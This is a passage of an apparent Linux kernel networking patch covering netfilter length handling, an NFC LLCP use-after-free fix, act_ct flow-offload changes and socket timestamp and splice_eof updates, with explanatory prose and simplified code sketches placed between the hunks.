+ 	offload->flow->timeout = max_t(u64, offload->flow->timeout,
+diff --git a/net/netfilter/nf_log_syslog.c b/net/netfilter/nf_log_syslog.c
+index cb894f0d63e9d..c66689ad2b491 100644
+--- a/net/netfilter/nf_log_syslog.c
++++ b/net/netfilter/nf_log_syslog.c
+@@ -322,7 +322,7 @@ dump_ipv4_packet(struct net *net, struct nf_log_buf *m,
+ 
+ 	/* Max length: 46 "LEN=65535 TOS=0xFF PREC=0xFF TTL=255 ID=65535 " */
+ 	nf_log_buf_add(m, "LEN=%u TOS=0x%02X PREC=0x%02X TTL=%u ID=%u ",
+-		       ntohs(ih->tot_len), ih->tos & IPTOS_TOS_MASK,
++		       iph_totlen(skb, ih), ih->tos & IPTOS_TOS_MASK,
+ 		       ih->tos & IPTOS_PREC_MASK, ih->ttl, ntohs(ih->id));
+ 
+ 	/* Max length: 6 "CE DF MF " */
+diff --git a/net/netfilter/nf_tables_core.c b/net/netfilter/nf_tables_core.c
+index cee3e4e905ec8..e0c117229ee9d 100644
+--- a/net/netfilter/nf_tables_core.c
++++ b/net/netfilter/nf_tables_core.c
+@@ -141,7 +141,7 @@ static bool nft_payload_fast_eval(const struct nft_expr *expr,
+ 	else {
+ 		if (!(pkt->flags & NFT_PKTINFO_L4PROTO))
+ 			return false;
+-		ptr = skb_network_header(skb) + nft_thoff(pkt);
++		ptr = skb->data + nft_thoff(pkt);
+ 	}
+ 
+ 	ptr += priv->offset;
+diff --git a/net/netfilter/nft_immediate.c b/net/netfilter/nft_immediate.c
+index 5f59dbab3e933..55fcf0280c5c3 100644
+--- a/net/netfilter/nft_immediate.c
++++ b/net/netfilter/nft_immediate.c
+@@ -78,7 +78,7 @@ static int nft_immediate_init(const struct nft_ctx *ctx,
+ 		case NFT_GOTO:
+ 			err = nf_tables_bind_chain(ctx, chain);
+ 			if (err < 0)
+-				return err;
++				goto err1;
+ 			break;
+ 		default:
+ 			break;
+diff --git a/net/netfilter/xt_length.c b/net/netfilter/xt_length.c
+index 9fbfad13176f0..ca730cedb5d41 100644
+--- a/net/netfilter/xt_length.c
++++ b/net/netfilter/xt_length.c
+@@ -21,7 +21,7 @@ static bool
+ length_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ {
+ 	const struct xt_length_info *info = par->matchinfo;
+-	u_int16_t pktlen = ntohs(ip_hdr(skb)->tot_len);
++	u32 pktlen = skb_ip_totlen(skb);
+ 
+ 	return (pktlen >= info->min && pktlen <= info->max) ^ info->invert;
+ }
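+
+skb_ip_totlen() and iph_totlen(), used in the ip_vs, nf_log_syslog and
+xt_length hunks above, exist because IPv4 BIG TCP GSO packets can exceed
+64 KiB and then carry tot_len == 0, so the real length has to be recovered
+from the skb. A simplified sketch of the helper's contract (condensed from
+the upstream helper, not verbatim):
+
+    static inline u32 iph_totlen(const struct sk_buff *skb,
+                                 const struct iphdr *iph)
+    {
+            u32 len = ntohs(iph->tot_len);
+
+            /* BIG TCP: a GSO TCP packet with tot_len == 0 means
+             * "longer than 64 KiB"; fall back to the skb length.
+             */
+            if (len == 0 && skb_is_gso(skb) && skb_is_gso_tcp(skb))
+                    return skb->len - skb_network_offset(skb);
+            return len;
+    }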
+diff --git a/net/nfc/llcp_core.c b/net/nfc/llcp_core.c
+index 1dac28136e6a3..18be13fb9b75a 100644
+--- a/net/nfc/llcp_core.c
++++ b/net/nfc/llcp_core.c
+@@ -145,6 +145,13 @@ static void nfc_llcp_socket_release(struct nfc_llcp_local *local, bool device,
+ 
+ static struct nfc_llcp_local *nfc_llcp_local_get(struct nfc_llcp_local *local)
+ {
++	/* Since using nfc_llcp_local may result in usage of nfc_dev, whenever
++	 * we hold a reference to local, we also need to hold a reference to
++	 * the device to avoid UAF.
++	 */
++	if (!nfc_get_device(local->dev->idx))
++		return NULL;
++
+ 	kref_get(&local->ref);
+ 
+ 	return local;
+@@ -177,10 +184,18 @@ static void local_release(struct kref *ref)
+ 
+ int nfc_llcp_local_put(struct nfc_llcp_local *local)
+ {
++	struct nfc_dev *dev;
++	int ret;
++
+ 	if (local == NULL)
+ 		return 0;
+ 
+-	return kref_put(&local->ref, local_release);
++	dev = local->dev;
++
++	ret = kref_put(&local->ref, local_release);
++	nfc_put_device(dev);
++
++	return ret;
+ }
+ 
+ static struct nfc_llcp_sock *nfc_llcp_sock_get(struct nfc_llcp_local *local,
+@@ -959,8 +974,17 @@ static void nfc_llcp_recv_connect(struct nfc_llcp_local *local,
+ 	}
+ 
+ 	new_sock = nfc_llcp_sock(new_sk);
+-	new_sock->dev = local->dev;
++
+ 	new_sock->local = nfc_llcp_local_get(local);
++	if (!new_sock->local) {
++		reason = LLCP_DM_REJ;
++		sock_put(&new_sock->sk);
++		release_sock(&sock->sk);
++		sock_put(&sock->sk);
++		goto fail;
++	}
++
++	new_sock->dev = local->dev;
+ 	new_sock->rw = sock->rw;
+ 	new_sock->miux = sock->miux;
+ 	new_sock->nfc_protocol = sock->nfc_protocol;
+@@ -1597,7 +1621,16 @@ int nfc_llcp_register_device(struct nfc_dev *ndev)
+ 	if (local == NULL)
+ 		return -ENOMEM;
+ 
+-	local->dev = ndev;
++	/* As we are going to initialize local's refcount, we need to get the
++	 * nfc_dev to avoid UAF, otherwise there is no point in continuing.
++	 * See nfc_llcp_local_get().
++	 */
++	local->dev = nfc_get_device(ndev->idx);
++	if (!local->dev) {
++		kfree(local);
++		return -ENODEV;
++	}
++
+ 	INIT_LIST_HEAD(&local->list);
+ 	kref_init(&local->ref);
+ 	mutex_init(&local->sdp_lock);
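+
+The net effect of the llcp_core.c hunks above: every reference to the LLCP
+"local" object now also pins the nfc_dev it points at, and the device
+reference is dropped only after the kref_put(), because local_release() may
+free "local" (and with it the local->dev pointer). Condensed to the bare
+get/put pattern (sketch with generic names, not the exact NFC code):
+
+    struct obj *obj_get(struct obj *o)
+    {
+            if (!owner_get(o->owner))    /* pin the owner first */
+                    return NULL;
+            kref_get(&o->ref);
+            return o;
+    }
+
+    int obj_put(struct obj *o)
+    {
+            struct owner *owner = o->owner;  /* o may be freed below */
+            int ret = kref_put(&o->ref, obj_release);
+
+            owner_put(owner);                /* drop the owner pin last */
+            return ret;
+    }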
+diff --git a/net/openvswitch/conntrack.c b/net/openvswitch/conntrack.c
+index c8eaf4234b2e0..0591cfb289d50 100644
+--- a/net/openvswitch/conntrack.c
++++ b/net/openvswitch/conntrack.c
+@@ -1252,7 +1252,7 @@ static int ovs_ct_commit(struct net *net, struct sw_flow_key *key,
+ 		if (err)
+ 			return err;
+ 
+-		nf_conn_act_ct_ext_add(ct);
++		nf_conn_act_ct_ext_add(skb, ct, ctinfo);
+ 	} else if (IS_ENABLED(CONFIG_NF_CONNTRACK_LABELS) &&
+ 		   labels_nonzero(&info->labels.mask)) {
+ 		err = ovs_ct_set_labels(ct, key, &info->labels.value,
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 4c7f7861ea967..d6d33f854050a 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -168,11 +168,11 @@ tcf_ct_flow_table_add_action_nat_udp(const struct nf_conntrack_tuple *tuple,
+ 
+ static void tcf_ct_flow_table_add_action_meta(struct nf_conn *ct,
+ 					      enum ip_conntrack_dir dir,
++					      enum ip_conntrack_info ctinfo,
+ 					      struct flow_action *action)
+ {
+ 	struct nf_conn_labels *ct_labels;
+ 	struct flow_action_entry *entry;
+-	enum ip_conntrack_info ctinfo;
+ 	u32 *act_ct_labels;
+ 
+ 	entry = tcf_ct_flow_table_flow_action_get_next(action);
+@@ -180,8 +180,6 @@ static void tcf_ct_flow_table_add_action_meta(struct nf_conn *ct,
+ #if IS_ENABLED(CONFIG_NF_CONNTRACK_MARK)
+ 	entry->ct_metadata.mark = READ_ONCE(ct->mark);
+ #endif
+-	ctinfo = dir == IP_CT_DIR_ORIGINAL ? IP_CT_ESTABLISHED :
+-					     IP_CT_ESTABLISHED_REPLY;
+ 	/* aligns with the CT reference on the SKB nf_ct_set */
+ 	entry->ct_metadata.cookie = (unsigned long)ct | ctinfo;
+ 	entry->ct_metadata.orig_dir = dir == IP_CT_DIR_ORIGINAL;
+@@ -235,22 +233,26 @@ static int tcf_ct_flow_table_add_action_nat(struct net *net,
+ }
+ 
+ static int tcf_ct_flow_table_fill_actions(struct net *net,
+-					  const struct flow_offload *flow,
++					  struct flow_offload *flow,
+ 					  enum flow_offload_tuple_dir tdir,
+ 					  struct nf_flow_rule *flow_rule)
+ {
+ 	struct flow_action *action = &flow_rule->rule->action;
+ 	int num_entries = action->num_entries;
+ 	struct nf_conn *ct = flow->ct;
++	enum ip_conntrack_info ctinfo;
+ 	enum ip_conntrack_dir dir;
+ 	int i, err;
+ 
+ 	switch (tdir) {
+ 	case FLOW_OFFLOAD_DIR_ORIGINAL:
+ 		dir = IP_CT_DIR_ORIGINAL;
++		ctinfo = IP_CT_ESTABLISHED;
++		set_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags);
+ 		break;
+ 	case FLOW_OFFLOAD_DIR_REPLY:
+ 		dir = IP_CT_DIR_REPLY;
++		ctinfo = IP_CT_ESTABLISHED_REPLY;
+ 		break;
+ 	default:
+ 		return -EOPNOTSUPP;
+@@ -260,7 +262,7 @@ static int tcf_ct_flow_table_fill_actions(struct net *net,
+ 	if (err)
+ 		goto err_nat;
+ 
+-	tcf_ct_flow_table_add_action_meta(ct, dir, action);
++	tcf_ct_flow_table_add_action_meta(ct, dir, ctinfo, action);
+ 	return 0;
+ 
+ err_nat:
+@@ -272,8 +274,39 @@ err_nat:
+ 	return err;
+ }
+ 
++static bool tcf_ct_flow_is_outdated(const struct flow_offload *flow)
++{
++	return test_bit(IPS_SEEN_REPLY_BIT, &flow->ct->status) &&
++	       test_bit(IPS_HW_OFFLOAD_BIT, &flow->ct->status) &&
++	       !test_bit(NF_FLOW_HW_PENDING, &flow->flags) &&
++	       !test_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags);
++}
++
++static void tcf_ct_flow_table_get_ref(struct tcf_ct_flow_table *ct_ft);
++
++static void tcf_ct_nf_get(struct nf_flowtable *ft)
++{
++	struct tcf_ct_flow_table *ct_ft =
++		container_of(ft, struct tcf_ct_flow_table, nf_ft);
++
++	tcf_ct_flow_table_get_ref(ct_ft);
++}
++
++static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft);
++
++static void tcf_ct_nf_put(struct nf_flowtable *ft)
++{
++	struct tcf_ct_flow_table *ct_ft =
++		container_of(ft, struct tcf_ct_flow_table, nf_ft);
++
++	tcf_ct_flow_table_put(ct_ft);
++}
++
+ static struct nf_flowtable_type flowtable_ct = {
++	.gc		= tcf_ct_flow_is_outdated,
+ 	.action		= tcf_ct_flow_table_fill_actions,
++	.get		= tcf_ct_nf_get,
++	.put		= tcf_ct_nf_put,
+ 	.owner		= THIS_MODULE,
+ };
+ 
+@@ -322,9 +355,13 @@ err_alloc:
+ 	return err;
+ }
+ 
++static void tcf_ct_flow_table_get_ref(struct tcf_ct_flow_table *ct_ft)
++{
++	refcount_inc(&ct_ft->ref);
++}
++
+ static void tcf_ct_flow_table_cleanup_work(struct work_struct *work)
+ {
+-	struct flow_block_cb *block_cb, *tmp_cb;
+ 	struct tcf_ct_flow_table *ct_ft;
+ 	struct flow_block *block;
+ 
+@@ -332,24 +369,18 @@ static void tcf_ct_flow_table_cleanup_work(struct work_struct *work)
+ 			     rwork);
+ 	nf_flow_table_free(&ct_ft->nf_ft);
+ 
+-	/* Remove any remaining callbacks before cleanup */
+ 	block = &ct_ft->nf_ft.flow_block;
+ 	down_write(&ct_ft->nf_ft.flow_block_lock);
+-	list_for_each_entry_safe(block_cb, tmp_cb, &block->cb_list, list) {
+-		list_del(&block_cb->list);
+-		flow_block_cb_free(block_cb);
+-	}
++	WARN_ON(!list_empty(&block->cb_list));
+ 	up_write(&ct_ft->nf_ft.flow_block_lock);
+ 	kfree(ct_ft);
+ 
+ 	module_put(THIS_MODULE);
+ }
+ 
+-static void tcf_ct_flow_table_put(struct tcf_ct_params *params)
++static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft)
+ {
+-	struct tcf_ct_flow_table *ct_ft = params->ct_ft;
+-
+-	if (refcount_dec_and_test(&params->ct_ft->ref)) {
++	if (refcount_dec_and_test(&ct_ft->ref)) {
+ 		rhashtable_remove_fast(&zones_ht, &ct_ft->node, zones_params);
+ 		INIT_RCU_WORK(&ct_ft->rwork, tcf_ct_flow_table_cleanup_work);
+ 		queue_rcu_work(act_ct_wq, &ct_ft->rwork);
+@@ -363,9 +394,20 @@ static void tcf_ct_flow_tc_ifidx(struct flow_offload *entry,
+ 	entry->tuplehash[dir].tuple.tc.iifidx = act_ct_ext->ifindex[dir];
+ }
+ 
++static void tcf_ct_flow_ct_ext_ifidx_update(struct flow_offload *entry)
++{
++	struct nf_conn_act_ct_ext *act_ct_ext;
++
++	act_ct_ext = nf_conn_act_ct_ext_find(entry->ct);
++	if (act_ct_ext) {
++		tcf_ct_flow_tc_ifidx(entry, act_ct_ext, FLOW_OFFLOAD_DIR_ORIGINAL);
++		tcf_ct_flow_tc_ifidx(entry, act_ct_ext, FLOW_OFFLOAD_DIR_REPLY);
++	}
++}
++
+ static void tcf_ct_flow_table_add(struct tcf_ct_flow_table *ct_ft,
+ 				  struct nf_conn *ct,
+-				  bool tcp)
++				  bool tcp, bool bidirectional)
+ {
+ 	struct nf_conn_act_ct_ext *act_ct_ext;
+ 	struct flow_offload *entry;
+@@ -384,6 +426,8 @@ static void tcf_ct_flow_table_add(struct tcf_ct_flow_table *ct_ft,
+ 		ct->proto.tcp.seen[0].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+ 		ct->proto.tcp.seen[1].flags |= IP_CT_TCP_FLAG_BE_LIBERAL;
+ 	}
++	if (bidirectional)
++		__set_bit(NF_FLOW_HW_BIDIRECTIONAL, &entry->flags);
+ 
+ 	act_ct_ext = nf_conn_act_ct_ext_find(ct);
+ 	if (act_ct_ext) {
+@@ -407,26 +451,34 @@ static void tcf_ct_flow_table_process_conn(struct tcf_ct_flow_table *ct_ft,
+ 					   struct nf_conn *ct,
+ 					   enum ip_conntrack_info ctinfo)
+ {
+-	bool tcp = false;
+-
+-	if ((ctinfo != IP_CT_ESTABLISHED && ctinfo != IP_CT_ESTABLISHED_REPLY) ||
+-	    !test_bit(IPS_ASSURED_BIT, &ct->status))
+-		return;
++	bool tcp = false, bidirectional = true;
+ 
+ 	switch (nf_ct_protonum(ct)) {
+ 	case IPPROTO_TCP:
+-		tcp = true;
+-		if (ct->proto.tcp.state != TCP_CONNTRACK_ESTABLISHED)
++		if ((ctinfo != IP_CT_ESTABLISHED &&
++		     ctinfo != IP_CT_ESTABLISHED_REPLY) ||
++		    !test_bit(IPS_ASSURED_BIT, &ct->status) ||
++		    ct->proto.tcp.state != TCP_CONNTRACK_ESTABLISHED)
+ 			return;
++
++		tcp = true;
+ 		break;
+ 	case IPPROTO_UDP:
++		if (!nf_ct_is_confirmed(ct))
++			return;
++		if (!test_bit(IPS_ASSURED_BIT, &ct->status))
++			bidirectional = false;
+ 		break;
+ #ifdef CONFIG_NF_CT_PROTO_GRE
+ 	case IPPROTO_GRE: {
+ 		struct nf_conntrack_tuple *tuple;
+ 
+-		if (ct->status & IPS_NAT_MASK)
++		if ((ctinfo != IP_CT_ESTABLISHED &&
++		     ctinfo != IP_CT_ESTABLISHED_REPLY) ||
++		    !test_bit(IPS_ASSURED_BIT, &ct->status) ||
++		    ct->status & IPS_NAT_MASK)
+ 			return;
++
+ 		tuple = &ct->tuplehash[IP_CT_DIR_ORIGINAL].tuple;
+ 		/* No support for GRE v1 */
+ 		if (tuple->src.u.gre.key || tuple->dst.u.gre.key)
+@@ -442,7 +494,7 @@ static void tcf_ct_flow_table_process_conn(struct tcf_ct_flow_table *ct_ft,
+ 	    ct->status & IPS_SEQ_ADJUST)
+ 		return;
+ 
+-	tcf_ct_flow_table_add(ct_ft, ct, tcp);
++	tcf_ct_flow_table_add(ct_ft, ct, tcp, bidirectional);
+ }
+ 
+ static bool
+@@ -596,6 +648,7 @@ static bool tcf_ct_flow_table_lookup(struct tcf_ct_params *p,
+ 	struct flow_offload_tuple tuple = {};
+ 	enum ip_conntrack_info ctinfo;
+ 	struct tcphdr *tcph = NULL;
++	bool force_refresh = false;
+ 	struct flow_offload *flow;
+ 	struct nf_conn *ct;
+ 	u8 dir;
+@@ -621,15 +674,40 @@ static bool tcf_ct_flow_table_lookup(struct tcf_ct_params *p,
+ 	flow = container_of(tuplehash, struct flow_offload, tuplehash[dir]);
+ 	ct = flow->ct;
+ 
++	if (dir == FLOW_OFFLOAD_DIR_REPLY &&
++	    !test_bit(NF_FLOW_HW_BIDIRECTIONAL, &flow->flags)) {
++		/* Only offload reply direction after connection became
++		 * assured.
++		 */
++		if (test_bit(IPS_ASSURED_BIT, &ct->status))
++			set_bit(NF_FLOW_HW_BIDIRECTIONAL, &flow->flags);
++		else if (test_bit(NF_FLOW_HW_ESTABLISHED, &flow->flags))
++			/* If flow_table flow has already been updated to the
++			 * established state, then don't refresh.
++			 */
++			return false;
++		force_refresh = true;
++	}
++
+ 	if (tcph && (unlikely(tcph->fin || tcph->rst))) {
+ 		flow_offload_teardown(flow);
+ 		return false;
+ 	}
+ 
+-	ctinfo = dir == FLOW_OFFLOAD_DIR_ORIGINAL ? IP_CT_ESTABLISHED :
+-						    IP_CT_ESTABLISHED_REPLY;
++	if (dir == FLOW_OFFLOAD_DIR_ORIGINAL)
++		ctinfo = test_bit(IPS_SEEN_REPLY_BIT, &ct->status) ?
++			IP_CT_ESTABLISHED : IP_CT_NEW;
++	else
++		ctinfo = IP_CT_ESTABLISHED_REPLY;
++
++	nf_conn_act_ct_ext_fill(skb, ct, ctinfo);
++	tcf_ct_flow_ct_ext_ifidx_update(flow);
++	flow_offload_refresh(nf_ft, flow, force_refresh);
++	if (!test_bit(IPS_ASSURED_BIT, &ct->status)) {
++		/* Process this flow in SW to allow promoting to ASSURED */
++		return false;
++	}
+ 
+-	flow_offload_refresh(nf_ft, flow);
+ 	nf_conntrack_get(&ct->ct_general);
+ 	nf_ct_set(skb, ct, ctinfo);
+ 	if (nf_ft->flags & NF_FLOWTABLE_COUNTER)
+@@ -832,18 +910,23 @@ out_free:
+ 	return err;
+ }
+ 
+-static void tcf_ct_params_free(struct rcu_head *head)
++static void tcf_ct_params_free(struct tcf_ct_params *params)
+ {
+-	struct tcf_ct_params *params = container_of(head,
+-						    struct tcf_ct_params, rcu);
+-
+-	tcf_ct_flow_table_put(params);
+-
++	if (params->ct_ft)
++		tcf_ct_flow_table_put(params->ct_ft);
+ 	if (params->tmpl)
+ 		nf_ct_put(params->tmpl);
+ 	kfree(params);
+ }
+ 
++static void tcf_ct_params_free_rcu(struct rcu_head *head)
++{
++	struct tcf_ct_params *params;
++
++	params = container_of(head, struct tcf_ct_params, rcu);
++	tcf_ct_params_free(params);
++}
++
+ #if IS_ENABLED(CONFIG_NF_NAT)
+ /* Modelled after nf_nat_ipv[46]_fn().
+  * range is only used for new, uninitialized NAT state.
+@@ -1121,7 +1204,7 @@ do_nat:
+ 		tcf_ct_act_set_labels(ct, p->labels, p->labels_mask);
+ 
+ 		if (!nf_ct_is_confirmed(ct))
+-			nf_conn_act_ct_ext_add(ct);
++			nf_conn_act_ct_ext_add(skb, ct, ctinfo);
+ 
+ 		/* This will take care of sending queued events
+ 		 * even if the connection is already confirmed.
+@@ -1390,7 +1473,7 @@ static int tcf_ct_init(struct net *net, struct nlattr *nla,
+ 
+ 	err = tcf_ct_flow_table_get(net, params);
+ 	if (err)
+-		goto cleanup_params;
++		goto cleanup;
+ 
+ 	spin_lock_bh(&c->tcf_lock);
+ 	goto_ch = tcf_action_set_ctrlact(*a, parm->action, goto_ch);
+@@ -1401,17 +1484,15 @@ static int tcf_ct_init(struct net *net, struct nlattr *nla,
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
+ 	if (params)
+-		call_rcu(&params->rcu, tcf_ct_params_free);
++		call_rcu(&params->rcu, tcf_ct_params_free_rcu);
+ 
+ 	return res;
+ 
+-cleanup_params:
+-	if (params->tmpl)
+-		nf_ct_put(params->tmpl);
+ cleanup:
+ 	if (goto_ch)
+ 		tcf_chain_put_by_act(goto_ch);
+-	kfree(params);
++	if (params)
++		tcf_ct_params_free(params);
+ 	tcf_idr_release(*a, bind);
+ 	return err;
+ }
+@@ -1423,7 +1504,7 @@ static void tcf_ct_cleanup(struct tc_action *a)
+ 
+ 	params = rcu_dereference_protected(c->params, 1);
+ 	if (params)
+-		call_rcu(&params->rcu, tcf_ct_params_free);
++		call_rcu(&params->rcu, tcf_ct_params_free_rcu);
+ }
+ 
+ static int tcf_ct_dump_key_val(struct sk_buff *skb,
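+
+The tcf_ct_params_free()/tcf_ct_params_free_rcu() split above follows the
+usual RCU deferred-free recipe: a plain destructor that error paths can call
+directly (the object was never published to readers), plus a thin rcu_head
+trampoline for objects that RCU readers may still be traversing. The generic
+shape (sketch, hypothetical names):
+
+    struct params {
+            struct sub *sub;         /* refcounted sub-object */
+            struct rcu_head rcu;
+    };
+
+    static void params_free(struct params *p)
+    {
+            if (p->sub)
+                    sub_put(p->sub); /* drop sub-references first */
+            kfree(p);
+    }
+
+    static void params_free_rcu(struct rcu_head *head)
+    {
+            params_free(container_of(head, struct params, rcu));
+    }
+
+    /* never-published object (init error path): free directly  */
+    params_free(p);
+    /* published object: wait out a grace period before freeing */
+    call_rcu(&p->rcu, params_free_rcu);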
+diff --git a/net/sched/em_text.c b/net/sched/em_text.c
+index 6f3c1fb2fb44c..f176afb70559e 100644
+--- a/net/sched/em_text.c
++++ b/net/sched/em_text.c
+@@ -97,8 +97,10 @@ retry:
+ 
+ static void em_text_destroy(struct tcf_ematch *m)
+ {
+-	if (EM_TEXT_PRIV(m) && EM_TEXT_PRIV(m)->config)
++	if (EM_TEXT_PRIV(m) && EM_TEXT_PRIV(m)->config) {
+ 		textsearch_destroy(EM_TEXT_PRIV(m)->config);
++		kfree(EM_TEXT_PRIV(m));
++	}
+ }
+ 
+ static int em_text_dump(struct sk_buff *skb, struct tcf_ematch *m)
+diff --git a/net/smc/smc_diag.c b/net/smc/smc_diag.c
+index 80ea7d954eceb..801044e7d1949 100644
+--- a/net/smc/smc_diag.c
++++ b/net/smc/smc_diag.c
+@@ -153,8 +153,7 @@ static int __smc_diag_dump(struct sock *sk, struct sk_buff *skb,
+ 			.lnk[0].link_id = link->link_id,
+ 		};
+ 
+-		memcpy(linfo.lnk[0].ibname,
+-		       smc->conn.lgr->lnk[0].smcibdev->ibdev->name,
++		memcpy(linfo.lnk[0].ibname, link->smcibdev->ibdev->name,
+ 		       sizeof(link->smcibdev->ibdev->name));
+ 		smc_gid_be16_convert(linfo.lnk[0].gid, link->gid);
+ 		smc_gid_be16_convert(linfo.lnk[0].peer_gid, link->peer_gid);
+diff --git a/net/socket.c b/net/socket.c
+index 04cba91c7cbe5..639d76f20384e 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -130,6 +130,7 @@ static ssize_t sock_sendpage(struct file *file, struct page *page,
+ static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
+ 				struct pipe_inode_info *pipe, size_t len,
+ 				unsigned int flags);
++static void sock_splice_eof(struct file *file);
+ 
+ #ifdef CONFIG_PROC_FS
+ static void sock_show_fdinfo(struct seq_file *m, struct file *f)
+@@ -164,6 +165,7 @@ static const struct file_operations socket_file_ops = {
+ 	.sendpage =	sock_sendpage,
+ 	.splice_write = generic_splice_sendpage,
+ 	.splice_read =	sock_splice_read,
++	.splice_eof =	sock_splice_eof,
+ 	.show_fdinfo =	sock_show_fdinfo,
+ };
+ 
+@@ -740,6 +742,7 @@ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ {
+ 	struct sockaddr_storage *save_addr = (struct sockaddr_storage *)msg->msg_name;
+ 	struct sockaddr_storage address;
++	int save_len = msg->msg_namelen;
+ 	int ret;
+ 
+ 	if (msg->msg_name) {
+@@ -749,6 +752,7 @@ int sock_sendmsg(struct socket *sock, struct msghdr *msg)
+ 
+ 	ret = __sock_sendmsg(sock, msg);
+ 	msg->msg_name = save_addr;
++	msg->msg_namelen = save_len;
+ 
+ 	return ret;
+ }
+@@ -826,7 +830,7 @@ static bool skb_is_swtx_tstamp(const struct sk_buff *skb, int false_tstamp)
+ 
+ static ktime_t get_timestamp(struct sock *sk, struct sk_buff *skb, int *if_index)
+ {
+-	bool cycles = sk->sk_tsflags & SOF_TIMESTAMPING_BIND_PHC;
++	bool cycles = READ_ONCE(sk->sk_tsflags) & SOF_TIMESTAMPING_BIND_PHC;
+ 	struct skb_shared_hwtstamps *shhwtstamps = skb_hwtstamps(skb);
+ 	struct net_device *orig_dev;
+ 	ktime_t hwtstamp;
+@@ -878,12 +882,12 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 	int need_software_tstamp = sock_flag(sk, SOCK_RCVTSTAMP);
+ 	int new_tstamp = sock_flag(sk, SOCK_TSTAMP_NEW);
+ 	struct scm_timestamping_internal tss;
+-
+ 	int empty = 1, false_tstamp = 0;
+ 	struct skb_shared_hwtstamps *shhwtstamps =
+ 		skb_hwtstamps(skb);
+ 	int if_index;
+ 	ktime_t hwtstamp;
++	u32 tsflags;
+ 
+ 	/* Race occurred between timestamp enabling and packet
+ 	   receiving.  Fill in the current time for now. */
+@@ -925,11 +929,12 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 	}
+ 
+ 	memset(&tss, 0, sizeof(tss));
+-	if ((sk->sk_tsflags & SOF_TIMESTAMPING_SOFTWARE) &&
++	tsflags = READ_ONCE(sk->sk_tsflags);
++	if ((tsflags & SOF_TIMESTAMPING_SOFTWARE) &&
+ 	    ktime_to_timespec64_cond(skb->tstamp, tss.ts + 0))
+ 		empty = 0;
+ 	if (shhwtstamps &&
+-	    (sk->sk_tsflags & SOF_TIMESTAMPING_RAW_HARDWARE) &&
++	    (tsflags & SOF_TIMESTAMPING_RAW_HARDWARE) &&
+ 	    !skb_is_swtx_tstamp(skb, false_tstamp)) {
+ 		if_index = 0;
+ 		if (skb_shinfo(skb)->tx_flags & SKBTX_HW_TSTAMP_NETDEV)
+@@ -937,14 +942,14 @@ void __sock_recv_timestamp(struct msghdr *msg, struct sock *sk,
+ 		else
+ 			hwtstamp = shhwtstamps->hwtstamp;
+ 
+-		if (sk->sk_tsflags & SOF_TIMESTAMPING_BIND_PHC)
++		if (tsflags & SOF_TIMESTAMPING_BIND_PHC)
+ 			hwtstamp = ptp_convert_timestamp(&hwtstamp,
+-							 sk->sk_bind_phc);
++							 READ_ONCE(sk->sk_bind_phc));
+ 
+ 		if (ktime_to_timespec64_cond(hwtstamp, tss.ts + 2)) {
+ 			empty = 0;
+ 
+-			if ((sk->sk_tsflags & SOF_TIMESTAMPING_OPT_PKTINFO) &&
++			if ((tsflags & SOF_TIMESTAMPING_OPT_PKTINFO) &&
+ 			    !skb_is_err_queue(skb))
+ 				put_ts_pktinfo(msg, skb, if_index);
+ 		}
+@@ -1088,6 +1093,14 @@ static ssize_t sock_splice_read(struct file *file, loff_t *ppos,
+ 	return sock->ops->splice_read(sock, ppos, pipe, len, flags);
+ }
+ 
++static void sock_splice_eof(struct file *file)
++{
++	struct socket *sock = file->private_data;
++
++	if (sock->ops->splice_eof)
++		sock->ops->splice_eof(sock);
++}
++
+ static ssize_t sock_read_iter(struct kiocb *iocb, struct iov_iter *to)
+ {
+ 	struct file *file = iocb->ki_filp;
+@@ -2128,6 +2141,7 @@ int __sys_sendto(int fd, void __user *buff, size_t len, unsigned int flags,
+ 		msg.msg_name = (struct sockaddr *)&address;
+ 		msg.msg_namelen = addr_len;
+ 	}
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	if (sock->file->f_flags & O_NONBLOCK)
+ 		flags |= MSG_DONTWAIT;
+ 	msg.msg_flags = flags;
+@@ -2479,6 +2493,7 @@ static int ____sys_sendmsg(struct socket *sock, struct msghdr *msg_sys,
+ 		msg_sys->msg_control = ctl_buf;
+ 		msg_sys->msg_control_is_user = false;
+ 	}
++	flags &= ~MSG_INTERNAL_SENDMSG_FLAGS;
+ 	msg_sys->msg_flags = flags;
+ 
+ 	if (sock->file->f_flags & O_NONBLOCK)
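+
+The ->splice_eof additions scattered through this patch (socket_file_ops,
+inet6_stream_ops, tcpv6_prot, udp_prot, udpv6_prot) wire one notification
+path from the VFS down to the protocol, so a protocol that batches output
+learns when a splice has written its last byte - e.g. a pending UDP cork can
+be pushed. The dispatch, flattened into one annotated sketch:
+
+    static void sock_splice_eof(struct file *file)
+    {
+            struct socket *sock = file->private_data;
+
+            if (sock->ops->splice_eof)        /* family level, e.g. inet */
+                    sock->ops->splice_eof(sock);
+            /* the family op then typically forwards to the protocol:
+             * sk->sk_prot->splice_eof(sock), e.g. udp_splice_eof(),
+             * which pushes pending frames unless UDP_CORK is set.
+             */
+    }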
+diff --git a/net/unix/af_unix.c b/net/unix/af_unix.c
+index 6dbeb80073338..be2ed7b0fe21c 100644
+--- a/net/unix/af_unix.c
++++ b/net/unix/af_unix.c
+@@ -211,8 +211,6 @@ static inline bool unix_secdata_eq(struct scm_cookie *scm, struct sk_buff *skb)
+ }
+ #endif /* CONFIG_SECURITY_NETWORK */
+ 
+-#define unix_peer(sk) (unix_sk(sk)->peer)
+-
+ static inline int unix_our_peer(struct sock *sk, struct sock *osk)
+ {
+ 	return unix_peer(osk) == sk;
+diff --git a/net/unix/unix_bpf.c b/net/unix/unix_bpf.c
+index 2f9d8271c6ec7..7ea7c3a0d0d06 100644
+--- a/net/unix/unix_bpf.c
